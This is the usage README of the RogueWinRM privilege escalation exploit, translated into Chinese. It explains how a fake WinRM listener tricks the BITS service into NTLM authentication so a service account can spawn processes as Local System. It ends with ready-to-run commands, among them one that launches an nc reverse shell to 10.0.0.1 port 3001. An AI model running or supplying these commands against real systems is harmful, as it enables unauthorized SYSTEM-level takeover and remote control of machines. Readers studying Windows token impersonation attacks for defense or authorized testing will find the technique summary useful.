RogueWinRM 是一个本地权限提升漏洞利用工具,允许从服务账户(具有 SeImpersonatePrivilege 权限)提升到本地系统账户,前提是 WinRM 服务未运行(Win10 默认未运行,但 Windows Server 2019 并非如此)。
简而言之,它会在 5985 端口监听传入连接,伪装成一个真正的 WinRM 服务。
它仅是一个最小的 Web 服务器,会尝试与任何试图连接该端口的服务协商 NTLM 身份验证。
然后,BITS 服务(以 Local System 身份运行)被触发,并尝试向我们的恶意监听器进行身份验证。一旦成功完成身份验证,我们就能模拟 Local System 用户,并以该权限生成任意进程。
关于此漏洞的完整技术描述,请参考此链接 --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
必需参数:
-p <程序>: 要启动的程序
可选参数:
-a <参数>: 传递给程序的命令行参数(默认为 NULL)
-l <端口>: 监听端口(默认为 5985 WinRM)
-d : 启用调试输出来

运行交互式 cmd:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
运行 nc 反向 shell:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"